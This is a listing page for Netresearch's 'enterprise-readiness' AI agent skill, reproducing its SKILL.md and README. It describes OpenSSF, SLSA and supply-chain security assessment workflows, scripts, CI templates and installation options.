enterprise-readiness
netresearch/enterprise-readiness-skillAssess and enhance software projects for enterprise-grade security, quality, and automation. Use when evaluating projects for production readiness, implementing supply chain security (SLSA, signing, SBOMs), hardening CI/CD pipelines, or establishing quality gates. Aligned with OpenSSF Scorecard, Best Practices Badge (all levels), SLSA, and S2C2F. By Netresearch.
SKILL.md
name: enterprise-readiness description: "Assess and enhance software projects for enterprise-grade security, quality, and automation. Use when evaluating projects for production readiness, implementing supply chain security (SLSA, signing, SBOMs), hardening CI/CD pipelines, or establishing quality gates. Aligned with OpenSSF Scorecard, Best Practices Badge (all levels), SLSA, and S2C2F. By Netresearch."
Enterprise Readiness Assessment
When to Use
- Evaluating projects for production/enterprise readiness
- Implementing supply chain security (SLSA, signing, SBOMs)
- Hardening CI/CD pipelines
- Establishing quality gates
- Pursuing OpenSSF Best Practices Badge (Passing/Silver/Gold)
Assessment Workflow
- Discovery: Identify platform (GitHub/GitLab), languages, existing CI/CD
- Scoring: Apply checklists from references based on stack
- Badge Assessment: Check OpenSSF criteria status
- Gap Analysis: List missing controls by severity
- Implementation: Apply fixes using scripts and templates
Reference Files (Load Based on Stack)
| Reference | When to Load |
|---|---|
references/general.md |
Always (universal 60 pts) |
references/github.md |
GitHub-hosted projects (40 pts) |
references/go.md |
Go projects (20 pts) |
references/openssf-badge-silver.md |
Pursuing Silver badge |
references/openssf-badge-gold.md |
Pursuing Gold badge |
Implementation Guides
| Guide | Purpose |
|---|---|
references/quick-start-guide.md |
Getting started |
references/dco-implementation.md |
DCO enforcement |
references/signed-releases.md |
Cosign/GPG signing |
references/reproducible-builds.md |
Deterministic builds |
references/security-hardening.md |
TLS, headers, validation |
references/solo-maintainer-guide.md |
N/A criteria justification |
references/branch-coverage.md |
Gold 80% branch coverage |
Automation Scripts
| Script | Purpose |
|---|---|
scripts/verify-badge-criteria.sh |
Verify OpenSSF badge criteria |
scripts/check-coverage-threshold.sh |
Statement coverage check |
scripts/check-branch-coverage.sh |
Branch coverage (Gold) |
scripts/add-spdx-headers.sh |
Add SPDX headers (Gold) |
scripts/verify-signed-tags.sh |
Tag signature verification |
scripts/verify-review-requirements.sh |
PR review requirements |
Document Templates
Templates in assets/templates/:
GOVERNANCE.md- Project governance (Silver)ARCHITECTURE.md- Technical docs (Silver)CODE_OF_CONDUCT.md- Contributor CovenantSECURITY_AUDIT.md- Security audit (Gold)BADGE_EXCEPTIONS.md- N/A justifications
CI Workflow Templates
GitHub Actions workflows in assets/workflows/:
| Workflow | Purpose |
|---|---|
scorecard.yml |
OpenSSF Scorecard security analysis |
codeql.yml |
Semantic code security scanning |
dependency-review.yml |
PR dependency CVE/license check |
slsa-provenance.yml |
SLSA Level 3 build attestation |
dco-check.yml |
Developer Certificate of Origin |
Copy workflows to .github/workflows/ and pin action versions with SHA hashes.
Scoring Interpretation
| Score | Grade | Status |
|---|---|---|
| 90-100 | A | Enterprise Ready |
| 80-89 | B | Production Ready |
| 70-79 | C | Development Ready |
| 60-69 | D | Basic |
| <60 | F | Not Ready |
Critical Rules
- NEVER interpolate
${{ github.event.* }}inrun:blocks (script injection) - NEVER guess action versions - always fetch from GitHub API
- ALWAYS use SHA pins for actions with version comments
- ALWAYS verify commit hashes against official tags
Related Skills
| Skill | Purpose |
|---|---|
go-development |
Go code patterns, Makefile interface, testing |
github-project |
Repository setup, branch protection, auto-merge |
security-audit |
Deep security audits (OWASP, XXE, SQLi) |
git-workflow |
Git branching, commits, PR workflows |
Resources
Contributing: Improvements to this skill should be submitted to the source repository: https://github.com/netresearch/enterprise-readiness-skill
README
Enterprise Readiness Skill
Netresearch AI skill for assessing and enhancing software projects to meet enterprise-grade standards for security, quality, and automation.
🔌 Compatibility
This is an Agent Skill following the open standard originally developed by Anthropic and released for cross-platform use.
Supported Platforms:
- ✅ Claude Code (Anthropic)
- ✅ Cursor
- ✅ GitHub Copilot
- ✅ Other skills-compatible AI agents
Skills are portable packages of procedural knowledge that work across any AI agent supporting the Agent Skills specification.
Features
- OpenSSF Framework Alignment - Complete coverage across Scorecard, Best Practices Badge (Passing/Silver/Gold), SLSA, and S2C2F
- Dynamic Scoring - Fair cross-stack assessment with platform/language-specific criteria
- Supply Chain Security - SLSA provenance, artifact signing, SBOM generation, dependency scanning
- Quality Gates - Testing layers, coverage thresholds, static analysis, secret scanning
- Automation Scripts - Ready-to-use scripts for security hardening and compliance checks
- Badge Progression - Guided path from Passing → Silver → Gold certification
Installation
Option 1: Via Netresearch Marketplace (Recommended)
claude mcp add-json netresearch-skills-bundle '{"type":"url","url":"https://raw.githubusercontent.com/netresearch/claude-code-marketplace/main/.claude-plugin/marketplace.json"}'
Then browse skills with /plugin.
Option 2: Download Release
Download the latest release and extract to ~/.claude/skills/enterprise-readiness/
Option 3: Composer (PHP projects)
composer require netresearch/agent-enterprise-readiness
Requires: netresearch/composer-agent-skill-plugin
Usage
The skill triggers on keywords like:
- "enterprise readiness", "production ready"
- "OpenSSF", "security scorecard", "best practices badge"
- "SLSA", "supply chain security", "SBOM"
- "quality gates", "CI/CD hardening"
Example Prompts
"Assess this project for enterprise readiness"
"What's needed for OpenSSF Best Practices Silver badge?"
"Help me reach SLSA Level 2"
"Set up supply chain security for this Go project"
Structure
enterprise-readiness/
├── SKILL.md # AI instructions
├── README.md # This file
├── LICENSE # MIT license
├── composer.json # PHP distribution
├── references/ # OpenSSF criteria documentation
│ ├── general.md # Universal checks (60 points)
│ ├── github.md # GitHub-specific (40 points)
│ ├── go.md # Go-specific (20 points)
│ ├── openssf-badge-silver.md
│ └── openssf-badge-gold.md
├── scripts/ # Automation scripts
│ ├── check-*.sh # Validation scripts
│ └── setup-*.sh # Configuration scripts
└── assets/ # Templates and configs
└── templates/ # CI/CD, SBOM, policy templates
Contributing
Contributions welcome! Please submit PRs for:
- Additional platform support (GitLab, Bitbucket)
- New language-specific checks
- Script improvements
- Documentation updates
License
MIT License - See LICENSE for details.
Credits
Developed and maintained by Netresearch DTT GmbH.
Made with ❤️ for Open Source by Netresearch